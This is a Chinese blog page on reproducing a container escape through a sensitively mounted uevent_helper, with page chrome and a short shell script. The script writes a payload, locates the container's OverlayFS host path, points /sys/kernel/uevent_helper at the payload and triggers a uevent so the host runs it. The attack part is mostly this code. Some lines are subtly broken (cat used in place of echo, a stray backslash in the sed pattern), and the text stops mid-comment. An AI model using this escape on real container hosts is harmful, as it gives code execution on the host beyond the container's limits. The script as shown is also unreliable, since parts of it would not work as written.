敏感挂载userhelper容器逃逸复现

信安成长日记

已于 2023-08-22 16:55:52 修改

阅读量204

点赞数

分类专栏：漏洞复现与分析文章标签：安全

于 2023-08-22 16:52:57 首次发布

本文链接：https://blog.csdn.net/SHELLCODE_8BIT/article/details/132431492

版权

漏洞复现与分析专栏收录该内容

12 篇文章 ¥9.90 ¥99.00

订阅专栏

超级会员免费看

本文详细介绍了敏感挂载导致的userhelper容器逃逸现象，通过分析原理并进行实际操作，揭示了安全风险及其防范措施。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

前言

分析

实验

前言

分析

实验

# Creates a payload
cat "#!/bin/sh" > /evil-helper
cat "ps > /output" >> /evil-helper
chmod +x /evil-helper
# Finds path of OverlayFS mount for container
# Unless the configuration explicitly exposes the mount point of the host filesystem
# see https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
# Sets uevent_helper to /path/payload
echo "$host_path/evil-helper" > /sys/kernel/uevent_helper
# Triggers a uevent
echo change > /sys/class/mem/null/uevent
# or else
# echo